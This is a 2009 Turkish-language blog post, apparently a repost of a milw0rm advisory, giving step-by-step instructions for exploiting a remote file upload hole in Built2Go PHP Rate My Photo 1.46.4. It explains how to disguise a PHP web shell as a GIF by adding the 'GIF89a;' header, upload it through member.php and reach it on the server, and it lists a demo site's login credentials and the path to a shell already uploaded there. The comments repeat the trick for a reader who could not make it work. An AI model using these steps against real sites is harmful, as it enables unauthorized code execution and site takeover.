"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

3 Ocak 2009 Cumartesi

Built2Go PHP Rate My Photo 1.46.4 Remote File Upload Vulnerability

Built2Go PHP Rate My Photo 1.46.4 Remote File Upload Vulnerability

link: http://www.milw0rm.com/exploits/7645



Discovered By: ZoRLu

first register to site

you add this code your shell to head

GIF89a;

example your_shell.php:

GIF89a;

...

...

...

?>

and save your_sheell.php

after go member.php

select your shell.php and your shell here:

http://z0rlu.blogspot.com/script/pictures/[id]shell.php

exp:

demo:

http://demos.built2go.com/rate%20my%20photo/1/

login:

http://demos.built2go.com/rate%20my%20photo/1/member.php

user: salla

pass: salla1

shell:

http://demos.built2go.com/rate%20my%20photo/1/pictures/418_2009-01-0204-11-57.php

2 yorum:

admin dedi ki...

Sorry i dont understand how this works and your intructions.
I need to upload my sheel as a picture?
because i cant upload .php files or all versions are patched now.

Thanks for your time

ZoRLu dedi ki...

for work your shell has its: GIF89a; you must add it your shell head example:

 
Dizi